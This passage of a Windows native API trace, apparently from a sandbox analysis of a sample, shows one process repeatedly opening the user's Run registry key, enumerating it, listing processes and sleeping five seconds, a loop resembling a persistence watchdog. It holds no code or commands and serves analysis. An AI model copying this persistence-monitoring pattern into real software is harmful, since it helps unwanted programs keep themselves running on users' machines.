KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.250] NtClose (Handle=0x154) returned 0x0 [0185.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.255] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.266] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.266] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.266] NtClose (Handle=0x154) returned 0x0 [0185.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.271] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.284] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.284] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.284] NtClose (Handle=0x154) returned 0x0 [0185.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.288] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.298] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.298] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.298] NtClose (Handle=0x154) returned 0x0 [0185.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.301] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.313] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.313] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.313] NtClose (Handle=0x154) returned 0x0 [0185.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.317] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.328] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.328] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.328] NtClose (Handle=0x154) returned 0x0 [0185.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.332] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.344] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.344] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.344] NtClose (Handle=0x154) returned 0x0 [0185.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.349] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.393] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.393] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.393] NtClose (Handle=0x154) returned 0x0 [0185.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.399] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.406] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.406] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.406] NtClose (Handle=0x154) returned 0x0 [0185.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.409] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.422] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.422] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.422] NtClose (Handle=0x154) returned 0x0 [0185.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.425] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.437] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.438] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.438] NtClose (Handle=0x154) returned 0x0 [0185.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.441] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.453] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.453] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.453] NtClose (Handle=0x154) returned 0x0 [0185.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.457] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.472] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.472] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.472] NtClose (Handle=0x154) returned 0x0 [0185.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.476] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.484] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.485] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.485] NtClose (Handle=0x154) returned 0x0 [0185.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, 